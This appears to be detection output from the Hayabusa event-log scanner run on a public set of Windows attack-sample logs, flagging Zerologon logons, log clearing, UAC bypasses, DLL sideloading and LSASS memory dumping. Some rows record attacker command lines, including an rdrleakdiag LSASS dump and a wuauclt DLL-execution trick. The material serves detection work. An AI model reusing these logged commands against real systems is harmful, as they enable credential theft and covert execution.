Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx -2020-09-16 04:29:51.517 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: 02694W-WIN10 : IP Address: 172.16.66.37 : Port: 49707 : LogonID: 0x31ff89,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx -2020-09-16 18:31:19.133 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Hidden user account created! (Possible Backdoor),User: $ : SID:S-1-5-21-308926384-506822093-3341789130-107103,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx -2020-09-16 18:32:13.647 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Hidden user account created! (Possible Backdoor),User: $ : SID:S-1-5-21-308926384-506822093-3341789130-107104,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx -2020-09-17 19:57:37.013 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx -2020-09-17 19:57:44.254 +09:00,01566s-win16-ir.threebeesco.com,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation 02694W-WIN10 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx 
-2020-09-17 19:57:44.270 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: 02694W-WIN10 : IP Address: 172.16.66.37 : Port: 49959 : LogonID: 0x853237,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx -2020-09-24 01:49:41.578 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx -2020-09-24 01:49:44.353 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{DC4537C3-CA73-4AC7-9E1D-B2CE27C3A7A6} : Path: C:\Windows\System32\dllhost.exe : User: 3B\Administrator : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx -2020-09-24 01:49:44.380 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{49F6E667-6658-4BD1-9DE9-6AF87F9FAF85} : Path: C:\Windows\System32\dllhost.exe : User: 3B\Administrator : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx -2020-09-24 01:50:16.697 +09:00,01566s-win16-ir.threebeesco.com,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation : Status: 
0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx -2020-09-24 01:50:16.697 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: - : IP Address: 172.16.66.37 : Port: 50106 : LogonID: 0x1136e95,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx -2020-09-24 01:50:16.702 +09:00,01566s-win16-ir.threebeesco.com,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx -2020-09-24 01:50:16.892 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 5424 -s 4616 : Path: C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx -2020-09-24 01:50:17.194 +09:00,01566s-win16-ir.threebeesco.com,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx -2020-09-24 01:50:17.194 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: - : IP Address: 172.16.66.37 : Port: 50107 : LogonID: 
0x1137987,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx -2020-09-24 01:50:17.200 +09:00,01566s-win16-ir.threebeesco.com,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx -2020-09-24 01:50:19.821 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\wermgr.exe -upload : Path: C:\Windows\System32\wermgr.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx -2020-09-28 21:47:36.197 +09:00,DESKTOP-PIU87N6,1,informational,Process Creation,"Command: rdrleakdiag.exe /p 668 /o C:\Users\wanwan\Desktop /fullmemdmp /snap : Path: C:\Windows\System32\rdrleakdiag.exe : User: DESKTOP-PIU87N6\wanwan : Parent Command: ""C:\WINDOWS\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx -2020-09-28 21:47:36.215 +09:00,DESKTOP-PIU87N6,1,informational,Process Creation,Command: C:\WINDOWS\system32\lsass.exe : Path: C:\Windows\System32\lsass.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\WINDOWS\system32\lsass.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx -2020-09-28 21:47:36.215 +09:00,DESKTOP-PIU87N6,1,critical,Suspicious LSASS Process Clone,,rules/sigma/process_creation/win_susp_lsass_clone.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx -2020-10-02 03:35:02.415 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: POC.exe : Path: C:\Users\Public\POC\bin\Debug\POC.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx -2020-10-02 03:35:02.415 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx -2020-10-02 03:35:02.606 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: Program : Path: C:\Users\Public\POC\bin\Debug\POC.exe : User: MSEDGEWIN10\IEUser : Parent Command: POC.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx -2020-10-02 03:35:02.606 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx -2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: C:\windows\system32\taskmgr.exe : Path: C:\Windows\System32\Taskmgr.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: Akagi_64.exe 59 cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx -2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: C:\windows\system32\taskmgr.exe : Path: C:\Windows\System32\Taskmgr.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: Akagi_64.exe 59 cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx -2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,informational,Process 
Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\windows\system32\taskmgr.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx -2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,low,Taskmgr as Parent,,rules/sigma/process_creation/win_susp_taskmgr_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx -2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\windows\system32\taskmgr.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx -2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,low,Taskmgr as Parent,,rules/sigma/process_creation/win_susp_taskmgr_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx -2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Windows\System32\mmc.exe"" WF.msc",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx -2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx -2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx -2020-10-07 06:40:30.910 +09:00,02694w-win10.threebeesco.com,7,medium,Unsigned Image Loaded Into LSASS 
Process,,rules/sigma/image_load/sysmon_unsigned_image_loaded_into_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ImageLoad_NFSH_Sysmon_7.evtx -2020-10-07 06:40:42.943 +09:00,02694w-win10.threebeesco.com,7,medium,Unsigned Image Loaded Into LSASS Process,,rules/sigma/image_load/sysmon_unsigned_image_loaded_into_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ImageLoad_NFSH_Sysmon_7.evtx -2020-10-07 07:11:17.814 +09:00,02694w-win10.threebeesco.com,13,high,DLL Load via LSASS,,rules/sigma/registry_event/sysmon_susp_lsass_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx -2020-10-07 07:11:17.848 +09:00,02694w-win10.threebeesco.com,12,high,DLL Load via LSASS,,rules/sigma/registry_event/sysmon_susp_lsass_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx -2020-10-14 05:11:42.278 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: c:\windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/evasion_execution_imageload_wuauclt_lolbas.evtx -2020-10-14 05:11:42.279 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: c:\windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/evasion_execution_imageload_wuauclt_lolbas.evtx -2020-10-15 22:17:02.403 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\smartscreen.exe -Embedding : 
Path: C:\Windows\System32\smartscreen.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx -2020-10-15 22:17:02.736 +09:00,MSEDGEWIN10,13,high,New RUN Key Pointing to Suspicious Folder,,rules/sigma/registry_event/sysmon_susp_run_key_img_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx -2020-10-15 22:17:02.736 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx -2020-10-15 22:17:02.737 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Internet Explorer\iexplore.exe"" : Path: C:\Program Files (x86)\Internet Explorer\iexplore.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\Public\tools\apt\tendyron.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx -2020-10-17 20:38:58.613 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-17 20:43:27.499 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\Public\tools\apt\wwlib\test.exe"" : Path: C:\Users\Public\tools\apt\wwlib\test.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:27.499 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\Public\tools\apt\wwlib\test.exe"" : Path: C:\Users\Public\tools\apt\wwlib\test.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:33.495 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart : Path: C:\Users\IEUser\AppData\Roaming\WINWORD.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\Public\tools\apt\wwlib\test.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:36.306 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:36.306 +09:00,MSEDGEWIN10,1,high,Microsoft Office Product Spawning Windows Shell,,rules/sigma/process_creation/win_office_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:40.902 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\explorer.exe"" : Path: C:\Windows\SysWOW64\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:40.903 +09:00,MSEDGEWIN10,8,high,CACTUSTORCH Remote Thread Creation,,rules/sigma/create_remote_thread/sysmon_cactustorch.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:45.120 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Roaming\WINWORD.exe"" : Path: C:\Users\IEUser\AppData\Roaming\WINWORD.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:45.120 +09:00,MSEDGEWIN10,1,high,MS Office Product Spawning Exe in User 
Dir,,rules/sigma/process_creation/win_office_spawn_exe_from_users_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c ping 127.0.0.1&&del del /F /Q /A:H ""C:\Users\IEUser\AppData\Roaming\wwlib.dll"" : Path: C:\Windows\SysWOW64\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,high,Microsoft Office Product Spawning Windows Shell,,rules/sigma/process_creation/win_office_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:50:02.661 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{ACA8FE61-4C38-4216-A89C-9F88343DF21F}-GoogleUpdateSetup.exe : URL: http://r3---sn-5hnedn7z.gvt1.com/edgedl/release2/update2/HvaldRNSrX7_feOQD9wvGQ_1.3.36.32/GoogleUpdateSetup.exe?cms_redirect=yes&mh=Aq&mip=213.127.67.142&mm=28&mn=sn-5hnedn7z&ms=nvh&mt=1602935359&mv=m&mvi=3&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-17 21:32:08.987 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{8B60600B-E6B4-4083-99F3-D3A4CFB95796}-86.0.4240.75_85.0.4183.121_chrome_updater.exe : URL: 
http://r2---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/W_YanCvPLKRFNu-eN8kKOw_86.0.4240.75/86.0.4240.75_85.0.4183.121_chrome_updater.exe?cms_redirect=yes&mh=ps&mip=213.127.67.142&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1602937879&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-17 21:32:11.026 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-17 21:32:11.318 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-17 21:32:11.574 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: SetupBinary : URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0006/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-17 21:33:56.406 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 01:27:08.081 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: calc.exe : Path: C:\Windows\SysWOW64\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\ProgramData\Intel\CV.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx -2020-10-18 01:27:08.734 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2008.2.0_x64__8wekyb3d8bbwe\Calculator.exe"" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca : Path: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2008.2.0_x64__8wekyb3d8bbwe\Calculator.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx -2020-10-18 01:27:10.464 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\RuntimeBroker.exe -Embedding : Path: C:\Windows\System32\RuntimeBroker.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx -2020-10-18 07:37:52.809 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:52.892 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:52.956 
